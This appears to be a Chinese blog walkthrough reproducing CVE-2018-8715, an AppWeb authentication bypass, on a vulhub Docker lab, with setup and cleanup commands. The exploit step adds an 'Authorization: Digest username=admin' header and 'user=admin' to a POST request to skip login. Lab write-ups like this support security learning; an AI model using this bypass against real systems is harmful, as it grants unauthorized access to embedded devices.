[vulhub]appweb认证绕过漏洞--CVE-2018-8715

0x00 前置

AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server。他使用C/C++来编写,能够运行在几乎先进所有流行的操作系统上。当然他最主要的应用场景还是为嵌入式设备提供Web Application容器。

AppWeb可以进行认证配置,其认证方式包括以下三种:

1、basic 传统HTTP基础认证

2、digest 改进版HTTP基础认证,认证成功后将使用Cookie来保存状态,而不用再传递Authorization头

3、form 表单认证

0x01 复现

1、搭建靶场

cd vulhub-master

ls查看一下

[vulhub]appweb认证绕过漏洞--CVE-2018-8715_第1张图片

选appweb靶场进入

[vulhub]appweb认证绕过漏洞--CVE-2018-8715_第2张图片

        启动靶场,-a查看靶机启动状态

docker-compose build
docker-compose up -d
docker-compose ps -a

[vulhub]appweb认证绕过漏洞--CVE-2018-8715_第3张图片

* 1.1 上一个靶机启动后,出现端口被占用错误,解决方案:

service docker stop
docker rm $(docker ps -aq)
rm /var/lib/docker/network/files/local-kv.db
systemctl restart docker

2、复现

抓包,改包,get改为post请求,加入:

Authorization:Digest username=admin

user=admin

放包,成功绕过身份验证

[vulhub]appweb认证绕过漏洞--CVE-2018-8715_第4张图片

[vulhub]appweb认证绕过漏洞--CVE-2018-8715_第5张图片 

 

 

你可能感兴趣的:(漏洞复现,web安全)